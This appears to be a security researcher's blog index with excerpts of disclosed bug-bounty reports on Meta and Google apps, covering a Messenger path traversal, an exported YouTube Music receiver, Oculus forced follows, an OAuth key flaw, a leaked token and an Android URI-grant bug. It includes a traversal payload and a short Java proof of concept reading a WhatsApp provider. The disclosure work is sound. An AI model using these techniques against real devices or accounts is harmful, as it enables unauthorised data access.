Vulnano

     This short writeup describes vulnerability found in Facebook Messenger for Windows in June 2024. It was reported during Meta BountyCon hacking event and helped me to climb on 1st place of results table.     Messenger bug      Meta introduced encrypted chats between Messenger users. It was possible to select friend and start encrypted chat with him (similar like we can do in Telegram - select user and start encrypted chat). I played with Messenger for Android trying to send attachments to victim on Windows in encrypted chat. Because chat is encrypted everything is verified on recipient side: client app must validate all data received from thirdparties and we can catch something interesting there.     I've sent attachment with ` %2e%2e%5c ` symbols and Messenger for Windows placed my attachment by next path: C:\\Users\\vulna\\AppData\\Local\\Messenger\\TamStorage\\media_bank\\AdvancedCrypto\\100027775233281\\persistent\\da7a85eb-aac7-...

Hi! Today I would like to post short tutorial about how your Android app may like/dislike any youtube video without user confirmation. [last check 14.02.2024] Youtube Music for Android has exported  PendingIntentReceiver defined in AndroidMafest.xml <receiver android:name="com.google.android.apps.youtube.music.player.widget.base.PendingIntentReceiver" android:exported="true"> <intent-filter> <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_play"/> <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_pause"/> <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_replay"/> <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_retry"/> <action android:name=...

Description Attacker was able to subscribe any Oculus user on attacker's Oculus account without user approval. So it was possible to make very attractive account with a lot of real followers without their approval:). This followers are displayed in Oculus Quest device when you open user profile, also in profile opened in Meta Quest for Android and some other places. Bug details  This page https://secure.oculus.com/my/people/   displays Oculus user followers:  

  App Signing All Android applications should be signed with keys generated by app developers ( https://source.android.com/security/apksigning ). When application signed with specific key we can verify that this app was not modified by thirdparty. Also it is possible to communicate between apps (IPC) and verify app identity by it key signature. If caller app has verified signature than we can allow it to do some restricted actions, for example we can return some confidential information to it like user information. This keys should be confidential and not be exposed outside. Bug Description I played with Facebook Sdk for Android and noticed one thing. This api call is not validates package name when you authorize your client_id ``` https://m.facebook.com/dialog/oauth?android_key= Xo8WBi6jzSxKDVR4drqm84yr9iU &calling_package_key=com.vulnano.android.facebook.sdkat&client_id=124024574287414&display=touch&facebook_sdk_version=8.1.0&redirect_uri=fbconnect%3A%2F%2Fsuc...

  At summer I decided to test Facebook Messenger for MacOS. Grepped all urls from code and started to analyze them. Quickly I noticed few urls on image with "access_token" value: Cool! Interesting is this token still valid? I opened https://developers.facebook.com/tools/debug/accesstoken/?access_token= and got confirmation: the token is valid! I stopped experiments and rapidly sent report to Facebook Team. All time before bounty decision I hoped that this token had some extra internal permissions. Unfortunately for me looks like it was just normal token, probably from Facebook employee, without any extra access. I think some software developer placed such link by mistake inside the app and it went over whole world)) So, be careful and attentive when you investigate hardcoded data inside apps ;) Facebook Messenger v. 97.11.116 (97.11.116.283083801) for MacOS Submitted: 27.07.2021 10:08AM Triaged: 27.07.2021 12:36AM Fixed: 27.07.2021 12:45AM (token became invalid, may be system...

Any thirdparty application was able to grant read/write access to any exported/non exported, secured by permissions content providers which were installed in system. It did't matter if content provider defined in AndroidManifest with grantUriPermission flag or not, if it was exported or no. Thirdparty were able to access any content provider in system without user interaction. Uri uri =Uri.parse("content://com.whatsapp.provider.media/item/5"); Intent intent = new Intent(Intent.ACTION_MAIN); intent.setClassName(getPackageName(), MainActivity.class.getName()); intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION); intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION); intent.putExtra(Intent.EXTRA_STREAM, uri); intent.setType("*/*"); startActivity(intent); And that's all :) When you launch that code on vulnerable Android your app receives access to passed "uri" value. ...

Probably somebody thinks to make his own build machine for Android. In the end of 2019 I bought next desktop PC: Hardware: AMD Ryzen 9 3900X Gigabyte X570 Aorus Elite HyperX Predator 2x16GB DDR4 PC4-25600 HX432C16PB3K2/32 Gigabyte Aorus NVMe Gen4 1TB GP-ASM2NE6100TTTD Palit GeForce GT 1030 2GB DDR4 OS Ubuntu 18.04.3 And here is some of build time logs RAM: 2400mhz make -j12 #### build completed successfully (54:13 (mm:ss)) #### RAM: 2400mhz -j18 #### build completed successfully (46:52 (mm:ss)) #### RAM: 2400mhz make -j24 #### build completed successfully (43:14 (mm:ss)) #### RAM: 3200mhz -j24 #### build completed successfully (41:55 (mm:ss)) #### branch with tag android-10.0.0_r_xx (don't remember android tag name))